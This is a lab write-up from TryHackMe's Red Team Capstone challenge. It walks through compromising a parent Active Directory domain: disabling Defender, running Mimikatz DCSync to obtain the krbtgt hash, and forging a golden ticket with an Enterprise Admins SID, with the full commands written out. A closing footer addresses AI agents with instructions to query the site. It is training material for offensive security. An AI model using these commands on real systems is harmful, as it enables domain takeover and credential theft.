# Full Compromise of Parent Domain ## Used Tools python webserver powershell mimikatz ## Summary From our attack machine and VPN server, we will start a web server to provide mimikatz and other tools to the corpdc domain controller used to compromise the parent domain. First, we deactivate the AV, and we unsuccessfully try to retrieve the Administrator hash from the rootdc running **lsadump::dcsync** with our Domain Admin user in Mimikatz. From there, we gather all the necessary information to craft a golden ticket to impersonate the Administrator and do it so. With the impersonated administrator, we are able to access the directories of rootdc and are able to retrieve the flags for fully compromising the parent domain. The next step is to create a user on rootdc with the tools PsExec and SMBExec, but will be discussed in the next section. ## Investigation Running a python webserver on the attack machine to provide the tools to the network.

Downloading the tools to the VPN machine.

Running a Python webserver on the VPN machine to provide the corpdc with the tools we need.

First, we run a PowerShell as administrator on the corpdc and disable AV with the following command and get Mimikatz from the VPN server. `set-mppreference -disablerealtimemonitoring $true`

Next, we run mimikatz, check our privileges and try to dump the hashes of the local administrator of the rootdc. But we’ll get an error, that the username is not unique which is clear, because there are multiple local administrators `lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator`

To get a unique identifier of the local administrator of the rootdc machine, we get the SID of the Administrator from the rootdc to repeat the process of dumping the credentials of the local administrator of the rootdc.

Again we get an error and are not able to retrieve the hash. `lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500`

After the many failed attempts we craft a golden ticket to impersonate the administrator to get any further. For this, the following information has to be gathered to craft a golden ticket. {% hint style="info" %} See also Exploiting Domain Trust {% endhint %} * The FQDN of the domain * `corp.thereserve.loc` * The SID of the child domain controller (CORPDC), which we will impersonate in our forged TGT * `S-1-5-21-170228521-1485475711-3199862024-1009` Get SID of CORPDC ``` PS C:\Windows\system32> Get-ADComputer -Identity "CORPDC" ```

* The SID of the Enterprise Admins in the parent domain, which we will add as an extra SID to our forged TGT * `S-1-5-21-1255581842-1300659601-3764024703-519` Get SID of ROOTDC ``` PS C:\Windows\system32> Get-ADGroup -Identity "Enterprise Admins" -Server rootdc.thereserve.loc ```

* The username of the account we want to impersonate * `Administrator` * The KRBTGT password hash * `0c757a3445acb94a654554f3ac529ede` ``` mimikatz # lsadump::dcsync /user:corp\krbtgt ```

```bash # From https://tryhackme.com/room/exploitingad kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4: /sids: /ptt ``` With that information, we are able to craft a golden ticket and impersonate the administrator. ```bash kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt ```

From there we are able to reach the directories of rootdc.

And place our proof of compromises in the given folders. The next section includes creating a new user on rootdc and adding this to the Domain Admins and Enterprise Admins, which would be part of this section, but for a clear structure and being part of compromising the BANK domain its discussed there.

## Flag-15: Foothold on Parent Domain ```bash PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Windows\Temp\0xb0b.txt ``` ## Flag-16: Administrative access to Parent Domain ```bash PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Users\Administrator\0xb0b.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/red-team-capstone-challenge/full-compromise-of-parent-domain.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.